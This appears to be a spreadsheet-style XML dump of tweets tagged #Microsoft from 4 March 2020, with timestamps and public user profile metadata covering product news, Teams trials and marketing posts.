    <t>{'id': 24617251, 'id_str': '24617251', 'name': 'TMJ-LON IT-.NET Jobs', 'screen_name': 'tmj_lon_itdnet', 'location': 'London', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in London. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/tRbvGptJRD', 'entities': {'url': {'urls': [{'url': 'https://t.co/tRbvGptJRD', 'expanded_url': 'http://bit.ly/2LdYR4y', 'display_url': 'bit.ly/2LdYR4y', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 229, 'friends_count': 199, 'listed_count': 2, 'created_at': 'Mon Mar 16 00:33:41 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 149,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'http://pbs.twimg.com/profile_images/682190040441569280/wpmEBdX3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682190040441569280/wpmEBdX3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24617251/1451481756',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</si>
  <si>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Mar 04 08:07:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Releases March 2020 Office Updates With Fixes, Improvements https://t.co/mFEnpHMKyT by @BleepinComputer</t>
  </si>
  <si>
    <t>Wed Mar 04 08:07:10 +0000 2020</t>
  </si>
  <si>
    <t>Halo: Combat Evolved Anniversary for PC is now available https://t.co/9SJL7XecYR #halo #pc #microsoft #bungie</t>
  </si>
  <si>
    <t>{'id': 31767699, 'id_str': '31767699', 'name': 'Turtlegirl73', 'screen_name': 'GirlGamersUK', 'location': 'LONDON', 'description': "I'm the editor of GGUK. You can find my instagram at turtlegirl73", 'url': 'http://t.co/POvSy1WsP5', 'entities': {'url': {'urls': [{'url': 'http://t.co/POvSy1WsP5', 'expanded_url': 'http://www.girlgamersuk.com/', 'display_url': 'girlgamersuk.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2452, 'friends_count': 992, 'listed_count': 174, 'created_at': 'Thu Apr 16 13:01:42 +0000 2009', 'favourites_count': 628, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 29484,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'http://pbs.twimg.com/profile_images/1233039736626917376/q67P-0MQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233039736626917376/q67P-0MQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/31767699/1560860777', 'profile_link_color': '050000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F2DB08', 'profile_text_color': '050002', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 08:06:47 +0000 2020</t>
  </si>
  <si>
    <t>Halo: Combat Evolved Anniversary for PC is now available https://t.co/QN9T7170y9 #halo #pc #microsoft #bungie</t>
  </si>
  <si>
    <t>{'id': 19019478, 'id_str': '19019478', 'name': 'Diane', 'screen_name': 'TURTLEGIRL73', 'location': 'England, United Kingdom', 'description': 'Diane Hutchinson. I work in the video games and television industry. You can find me on Instagram @turtlegirl73 - email editor@girlgamersuk.com', 'url': 'https://t.co/mQ4II7zamS', 'entities': {'url': {'urls': [{'url': 'https://t.co/mQ4II7zamS', 'expanded_url': 'http://www.girlgamersuk.com', 'display_url': 'girlgamersuk.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9402, 'friends_count': 5905, 'listed_count': 365, 'created_at': 'Thu Jan 15 12:13:10 +0000 2009', 'favourites_count': 42206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 65425, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FA0D0D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme12/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1234235333157494790/J6XsU4ag_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234235333157494790/J6XsU4ag_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19019478/1409218706', 'profile_link_color': 'E81C4F', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F2DB08', 'profile_text_color': '000205', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 08:04:24 +0000 2020</t>
  </si>
  <si>
    <t>Get an impression how #microsoft is using its own technology to empower our customers  to achieve more. #dynamics365  #powerplatform #powerapps https://t.co/JLAy6QH3Zk</t>
  </si>
  <si>
    <t>Wed Mar 04 08:03:06 +0000 2020</t>
  </si>
  <si>
    <t>At velvot, with Microsoft teams, you can work better and will thrive with right digital transformation strategy
#velvotng #microsoft
#microsoftteams
#digitalstrategypartner
#WednesdayVibes #lagos #Nigeria https://t.co/n9YCnL7S2y</t>
  </si>
  <si>
    <t>Wed Mar 04 08:01:39 +0000 2020</t>
  </si>
  <si>
    <t>How is your broom closet more secure than a server room with bank-level security? The short answer is: you need to upgrade your IT infrastructure and help4IT and #Microsoft can help. https://t.co/UMp4foLDRE</t>
  </si>
  <si>
    <t>{'id': 205270425, 'id_str': '205270425', 'name': 'help4IT', 'screen_name': 'TheReal_help4IT', 'location': 'City of London', 'description': "Award Winning IT Support, Call 0800 043 4448 for high value computer support. We're a team of friendly IT experts. Let us know if you need advice.", 'url': 'http://t.co/wYVEmxVkmL', 'entities': {'url': {'urls': [{'url': 'http://t.co/wYVEmxVkmL', 'expanded_url': 'http://www.help4it.co.uk/', 'display_url': 'help4it.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8207, 'friends_count': 8016, 'listed_count': 257, 'created_at': 'Wed Oct 20 14:01:03 +0000 2010', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9603,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'http://pbs.twimg.com/profile_images/940201669152751617/qZJFJY7k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/940201669152751617/qZJFJY7k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/205270425/1389785097', 'profile_link_color': 'C52442', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': 'B6041E', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 08:00:51 +0000 2020</t>
  </si>
  <si>
    <t>We look at the market-moving events that have shaped equity markets last week  Click here to find out more  https://t.co/Zegu4fuImW
#coronavirus #airlines #China #Italy #Brexit #Mastercard #Marriott #Microsoft #tech #IPOs #Barclays #Disney #VirginGalactic https://t.co/bCeCdRiiBb</t>
  </si>
  <si>
    <t>{'id': 747547064, 'id_str': '747547064', 'name': 'Charles Stanley Direct', 'screen_name': 'CStanleyDirect', 'location': 'United Kingdom', 'description': 'Official Twitter account of Charles Stanley Direct - a great value UK platform for DIY Fund and Share dealing.', 'url': 'http://t.co/MS4EWFNYGc', 'entities': {'url': {'urls': [{'url': 'http://t.co/MS4EWFNYGc', 'expanded_url': 'http://www.cs-d.co.uk', 'display_url': 'cs-d.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3409, 'friends_count': 153, 'listed_count': 31, 'created_at': 'Thu Aug 09 16:51:02 +0000 2012', 'favourites_count': 371, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7716, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '293B59', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/704617183318568960/fXdw2m9s_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/704617183318568960/fXdw2m9s_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/747547064/1580722601', 'profile_link_color': '91D2FA',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</si>
  <si>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08:00:44 +0000 2020</t>
  </si>
  <si>
    <t>Thorsten Hans, who has been repeatedly awarded as #Azure #MVP by #Microsoft,
is going to inspire you about #Kubernetes #Network #Policies.
&amp;gt;&amp;gt; https://t.co/5wv8p7T66R 
#DevOpsCon #DevOps https://t.co/V5zDeRkhcC</t>
  </si>
  <si>
    <t>{'id': 2929314495, 'id_str': '2929314495', 'name': 'DevopsCon', 'screen_name': 'devops_con', 'location': 'Munich, Germany', 'description': 'The Global Conference Series for Continuous Delivery, Microservices, Docker, Cloud &amp; Lean Business | Imprint: https://t.co/kPBooqXDrY', 'url': 'https://t.co/brZuPkTZ46', 'entities': {'url': {'urls': [{'url': 'https://t.co/brZuPkTZ46', 'expanded_url': 'https://devopscon.io/?loc=all', 'display_url': 'devopscon.io/?loc=all', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/kPBooqXDrY', 'expanded_url': 'http://devopscon.io/imprint/', 'display_url': 'devopscon.io/imprint/', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 2277, 'friends_count': 119, 'listed_count': 175, 'created_at': 'Thu Dec 18 10:55:05 +0000 2014', 'favourites_count': 1455, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3893,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'http://pbs.twimg.com/profile_images/1186208284962967552/-TSWapgH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186208284962967552/-TSWapgH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2929314495/1572360066', 'profile_link_color': '2F515D',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</si>
  <si>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08:00:26 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft &amp;amp; Tablet Academy are working together to provide schools, colleges and trusts' free support to review their current use of technology, in order to embed a sustainable 3-year digital strategy. Find out more here:
https://t.co/Wzpd7CcUfL
#microsoft #teaching https://t.co/Pm7WyOKHE7</t>
  </si>
  <si>
    <t>{'id': 1583227070, 'id_str': '1583227070', 'name': 'Tablet Academy UK', 'screen_name': 'TabletAcademyUK', 'location': 'Telford, England', 'description': 'A leading provider of consultancy and end-user training focused on people and outcomes, not the technology.', 'url': 'http://t.co/m37QBXRVIe', 'entities': {'url': {'urls': [{'url': 'http://t.co/m37QBXRVIe', 'expanded_url': 'http://www.tablet-academy.com', 'display_url': 'tablet-academy.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2939, 'friends_count': 2018, 'listed_count': 167, 'created_at': 'Wed Jul 10 14:17:17 +0000 2013', 'favourites_count': 570, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5488, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FA6E03', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/474127410753859584/x1ovMsaf_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474127410753859584/x1ovMsaf_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1583227070/1501599925', 'profile_link_color': 'FCA903',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</si>
  <si>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Mar 04 08:00:14 +0000 2020</t>
  </si>
  <si>
    <t>Telkomsel will utilize @Microsofts cloud capabilities while the latter will leverage on @Telkomsels wide network.
#Telco #Cloud #Network #Microsoft #Indonesia
https://t.co/524G3auIwb</t>
  </si>
  <si>
    <t>{'id': 895929206013480960, 'id_str': '895929206013480960', 'name': 'KrASIA', 'screen_name': 'KrASIAofficial', 'location': 'Singapore', 'description': 'Subscribe to our weekly newsletter: https://t.co/dRIteHrPZl\nKrASIA Youtube Channel: https://t.co/Nq81JcxyTD\n#tech #news #asia #china', 'url': 'https://t.co/FRvpOFBJz1', 'entities': {'url': {'urls': [{'url': 'https://t.co/FRvpOFBJz1', 'expanded_url': 'https://kr-asia.com', 'display_url': 'kr-asia.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/dRIteHrPZl', 'expanded_url': 'http://kr-asia.com/subscribe', 'display_url': 'kr-asia.com/subscribe', 'indices': [36, 59]}, {'url': 'https://t.co/Nq81JcxyTD', 'expanded_url': 'http://bit.ly/krasiayoutube', 'display_url': 'bit.ly/krasiayoutube', 'indices': [84, 107]}]}}, 'protected': False, 'followers_count': 873, 'friends_count': 175, 'listed_count': 17, 'created_at': 'Fri Aug 11 08:45:43 +0000 2017', 'favourites_count': 377, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3932,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'http://pbs.twimg.com/profile_images/1028224701590470656/LCabtVJJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1028224701590470656/LCabtVJJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/895929206013480960/1534313045', 'profile_link_color': '1266F1',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</si>
  <si>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#Microsoft Brings Defender Antivirus for #Linux, Coming Soon for #Android and iOS https://t.co/qBWc63pxzs #TheHackerNews</t>
  </si>
  <si>
    <t>Wed Mar 04 08:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#Schneider Electric &amp;amp; #ThoughtWire drive patient-focused #healthcare with #digital facilities solution - #Microsoft #Azure #IoT #France @ChrissyJRoberts Dale Hall https://t.co/6p1RtguDIM #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 08:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Will Microsoft rule the antivirus and cyber security space as well?  At least in the virtual world, they might. #AI #iOS #Android #Microsoft #CyberSecurity #Virus #Antivirus #Innovation #ACINMilan #MS https://t.co/vgAVHYjg90</t>
  </si>
  <si>
    <t>{'id': 876445510307074048, 'id_str': '876445510307074048', 'name': 'Maria Mazzone', 'screen_name': 'merimazzone', 'location': '', 'description': 'Consumer Goods Senior Program Manager @Accenture, CPG and Retail lead for Accenture Customer Innovation Network Milan, All views are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 31, 'listed_count': 2, 'created_at': 'Sun Jun 18 14:24:28 +0000 2017', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 983, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/876522416398270474/rwkQZIyc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876522416398270474/rwkQZIyc_normal.jpg',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</si>
  <si>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07:58:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has quietly started offering free trials of its premium #Teams chat app to 'support public health and safety' amid the #coronavirus outbreak https://t.co/nB7vO85vsp via @businessinsider</t>
  </si>
  <si>
    <t>Wed Mar 04 07:57:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft teases new #Windows10 Start menu that de-emphasizes Live Tiles https://t.co/5r2tG06K5l #tech #ITNews</t>
  </si>
  <si>
    <t>Wed Mar 04 07:52:16 +0000 2020</t>
  </si>
  <si>
    <t>"Teaching Old Markets New Tricks"
"Market design," a form of applied economics that promises to improve outcomes in almost every domain one can imagine. New insights from former #Microsoft economist Preston McAfee &amp;amp; @MonashUni Dean Simon Wilkie https://t.co/wXVhdS3BLb https://t.co/wH9CdUNyQo</t>
  </si>
  <si>
    <t>{'id': 1017326979559952385, 'id_str': '1017326979559952385', 'name': 'Luohan Academy ç½—æ±‰å ‚', 'screen_name': 'Luohan_Academy', 'location': 'Hangzhou, China', 'description': 'Luohan Academy is an open research platform initiated by @AlibabaGroup and launched by world-renowned social scientists.', 'url': 'https://t.co/3CPTKsVCoZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/3CPTKsVCoZ', 'expanded_url': 'http://www.luohanacademy.com', 'display_url': 'luohanacademy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1338, 'friends_count': 135, 'listed_count': 4, 'created_at': 'Thu Jul 12 08:37:07 +0000 2018', 'favourites_count': 175, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 233,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'http://pbs.twimg.com/profile_images/1088340170942799873/IpfIBEip_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088340170942799873/IpfIBEip_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1017326979559952385/1572329417',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</si>
  <si>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07:52:09 +0000 2020</t>
  </si>
  <si>
    <t>2/ #Microsoft is offering free six-month trials globally for a premium tier of Microsoft Teams to aid remote work during #COVID19 
https://t.co/OjwcrpRPi0</t>
  </si>
  <si>
    <t>{'id': 1417547839, 'id_str': '1417547839', 'name': 'Grata', 'screen_name': 'grata_co', 'location': 'Beijing', 'description': 'Live Chat for the messaging era: #WeChat, Mini-Programs, Messenger, and web chat. Follow for regular updates on #Messaging', 'url': 'https://t.co/FDDbMoKM9w', 'entities': {'url': {'urls': [{'url': 'https://t.co/FDDbMoKM9w', 'expanded_url': 'http://grata.co', 'display_url': 'grata.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 436, 'friends_count': 70, 'listed_count': 34, 'created_at': 'Fri May 10 08:26:18 +0000 2013', 'favourites_count': 129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1094,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'http://pbs.twimg.com/profile_images/895502899064709120/_bqKnWkK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895502899064709120/_bqKnWkK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1417547839/1397028746', 'profile_link_color': 'C3B17A',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</si>
  <si>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Wed Mar 04 07:52:06 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@britishgirlxrp #4IR tokenise the world
#google #microsoft #swift #NASA 
</t>
  </si>
  <si>
    <t>{'id': 946416460422897665, 'id_str': '946416460422897665', 'name': 'CastelE', 'screen_name': 'Casteleah_E', 'location': 'BelgiÃ«', 'description': 'ðŸ–¤ðŸ’›â¤ ðŸ‡§ðŸ‡ªðŸ‡ªðŸ‡º', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 241, 'friends_count': 794, 'listed_count': 1, 'created_at': 'Thu Dec 28 16:24:02 +0000 2017', 'favourites_count': 7054, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3971, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1105709442681790464/3fGnu3mh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105709442681790464/3fGnu3mh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/946416460422897665/1542073743',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</si>
  <si>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07:51:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft confirms Live Tiles will not go away, but your Windows 10 Start Menu will look better without them
#microsoft #windows10 #windows10x #startscreen #livetiles https://t.co/2OvXl35c3S https://t.co/RCky8v1n84</t>
  </si>
  <si>
    <t>{'id': 114460174, 'id_str': '114460174', 'name': 'Nerdy Technos', 'screen_name': 'nerdytechnos', 'location': 'Bangalore', 'description': 'A technology blogging site', 'url': 'https://t.co/NRmwf3wlvO', 'entities': {'url': {'urls': [{'url': 'https://t.co/NRmwf3wlvO', 'expanded_url': 'http://www.nerdytechnos.com', 'display_url': 'nerdytechnos.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 151, 'listed_count': 0, 'created_at': 'Mon Feb 15 13:52:40 +0000 2010', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 492,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'http://pbs.twimg.com/profile_images/1187787443866652672/ix0bkezx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187787443866652672/ix0bkezx_normal.jpg', 'profile_link_color': 'D02B55', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '99CC33', 'profile_text_color': '3E4415', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 07:50:51 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft OFFICE 2019 PROFESSIONAL PLUS USB PACK SEALED 3 PC #2019 #Microsoft #office #Pack #Plus #professional #sealed https://t.co/CNfAQvXIMk</t>
  </si>
  <si>
    <t>Wed Mar 04 07:46:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft updates Visual Studio roadmap https://t.co/AIsoIjabpK https://t.co/ks35Gjw7hj</t>
  </si>
  <si>
    <t>{'id': 134761085, 'id_str': '134761085', 'name': 'CodeTwo Software', 'screen_name': 'CodeTwoSoftware', 'location': 'Jelenia Gora, Poland', 'description': 'CodeTwo Software Engineering. Certified programs for #emailsignatures management, migration, backup and synchronization in #MSExchange, #Office365 and #Outlook.', 'url': 'https://t.co/koiPO3arVc', 'entities': {'url': {'urls': [{'url': 'https://t.co/koiPO3arVc', 'expanded_url': 'http://codetwo.com', 'display_url': 'codetwo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2241, 'friends_count': 1365, 'listed_count': 86, 'created_at': 'Mon Apr 19 11:02:55 +0000 2010', 'favourites_count': 724, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2455,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'http://pbs.twimg.com/profile_images/950277828586680320/tfGCtDbV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/950277828586680320/tfGCtDbV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/134761085/1575963942',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</si>
  <si>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07:38:09 +0000 2020</t>
  </si>
  <si>
    <t>#Cloud updates for March 3, 2020
https://t.co/hAtAV4ImP0
#AWS #GCP #Azure #Microsoft #AmazonWebServices #OCI #OracleCloud #AI #ML #ArtificialIntelligence #Serverless #DeveloperTools https://t.co/TynILYKVjg</t>
  </si>
  <si>
    <t>Wed Mar 04 07:38:00 +0000 2020</t>
  </si>
  <si>
    <t>Announcing: New #PowerBI tab for #microsoft Teams from @lukasztweets https://t.co/zqlDNnRrQf</t>
  </si>
  <si>
    <t>{'id': 1103272256480952324, 'id_str': '1103272256480952324', 'name': 'Power BI Weekly', 'screen_name': 'PowerBIWeekly', 'location': '', 'description': 'Your free weekly newsletter, all about @MSPowerBI. Subscribe at https://t.co/3ciPjWFqkS. Published every Tuesday. Powered by @endjin', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/3ciPjWFqkS', 'expanded_url': 'http://powerbiweekly.info', 'display_url': 'powerbiweekly.info', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 1491, 'friends_count': 302, 'listed_count': 23, 'created_at': 'Wed Mar 06 12:32:58 +0000 2019', 'favourites_count': 80, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1911,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'http://pbs.twimg.com/profile_images/1129434845736775680/_eW8WFOC_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129434845736775680/_eW8WFOC_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1103272256480952324/1553507827', 'profile_link_color': '1B4687',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</si>
  <si>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07:37:04 +0000 2020</t>
  </si>
  <si>
    <t>When you take advantage of @MSPowerApps to help with running an American Flag Football league Stats capture, Score updates and running a live stream feed. @CarnegieFlag  #Microsoft #PowerPlatform #PowerApps https://t.co/We5t0iSZmO</t>
  </si>
  <si>
    <t>{'id': 856437079, 'id_str': '856437079', 'name': 'Stuart Anderson', 'screen_name': 'StuTreeAnderson', 'location': 'Dunfermline', 'description': 'SharePointer and owner of @StandsureTech with Dad, Basketball ðŸ€ and Football ðŸˆ thrown in. #PowerPlatform #SharePoint #Office365', 'url': 'https://t.co/e3RXdhZEAH', 'entities': {'url': {'urls': [{'url': 'https://t.co/e3RXdhZEAH', 'expanded_url': 'http://www.StandsureTechnology.co.uk', 'display_url': 'StandsureTechnology.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 173, 'friends_count': 366, 'listed_count': 0, 'created_at': 'Mon Oct 01 14:09:40 +0000 2012', 'favourites_count': 2791, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1193,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'http://pbs.twimg.com/profile_images/1217918822071652352/JzH_g2Sd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217918822071652352/JzH_g2Sd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/856437079/1579209450',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</si>
  <si>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Mar 04 07:31:01 +0000 2020</t>
  </si>
  <si>
    <t>The #Vaticano presented #RomeCallforAIEthics on how to bring more #ethics to the development of #AI for humanity and #IBM and #Microsoft are among the first signatories.
https://t.co/pQNAXWXuBY https://t.co/52N60rUYEh</t>
  </si>
  <si>
    <t>{'id': 25513487, 'id_str': '25513487', 'name': 'Jair Ribeiro', 'screen_name': 'Liberoliber', 'location': 'Wroclaw, Poland', 'description': "Your time is limited, so don't waste it living someone else's life.", 'url': 'https://t.co/5T2UX6Qt39', 'entities': {'url': {'urls': [{'url': 'https://t.co/5T2UX6Qt39', 'expanded_url': 'https://www.linkedin.com/in/jairribeiro', 'display_url': 'linkedin.com/in/jairribeiro', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 956, 'friends_count': 693, 'listed_count': 41, 'created_at': 'Fri Mar 20 14:42:13 +0000 2009', 'favourites_count': 1024, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7995,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'http://pbs.twimg.com/profile_images/1227989645943885829/DK2-RRDD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227989645943885829/DK2-RRDD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25513487/1479402164',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</si>
  <si>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07:30:56 +0000 2020</t>
  </si>
  <si>
    <t>Learn practices to improve the quality &amp;amp; execution of #opensource contributions. https://t.co/zHkUY0kfTc #Github #DigitalTransformation #insurtech #Technology #DevOps #Data #DataScience #Healthcare #Techblogs #Redhat #Software #innovation #Developers #linux #microsoft #java #tech</t>
  </si>
  <si>
    <t>{'id': 981090058831826945, 'id_str': '981090058831826945', 'name': 'TechScapes', 'screen_name': 'TechnDiscussion', 'location': '', 'description': 'A platform to discuss about #technology, latest trends &amp; news. Connect with Tech Geeks ðŸ‘¨\u200dðŸ’» &amp; share your opinion! \n#MachineLearning #DeepLearning #IoT #Bigdata', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 409, 'friends_count': 246, 'listed_count': 21, 'created_at': 'Tue Apr 03 08:44:32 +0000 2018', 'favourites_count': 744, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2265, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/981441828175142913/__Vk70dW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981441828175142913/__Vk70dW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/981090058831826945/1522842002',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</si>
  <si>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07:30:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft officially announces Universal Print, a #cloud-based print server solution - MSPoweruser.  https://t.co/n7dJQTjTMh</t>
  </si>
  <si>
    <t>{'id': 213306799, 'id_str': '213306799', 'name': 'eranga', 'screen_name': 'erangatennakoon', 'location': 'Sri Lanka', 'description': 'Life isnâ€™t easy, and never it was.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8877, 'friends_count': 755, 'listed_count': 604, 'created_at': 'Mon Nov 08 15:29:37 +0000 2010', 'favourites_count': 83236, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 266841,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'http://pbs.twimg.com/profile_images/1224511765066719232/8KFGb0GZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224511765066719232/8KFGb0GZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/213306799/1583452995', 'profile_link_color': '3296BF',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'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 07:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Assessing All @Google #AdExtensions for 2020 (and a Couple from #Microsoft).
Details here :
 https://t.co/7CKyFRdZ5H</t>
  </si>
  <si>
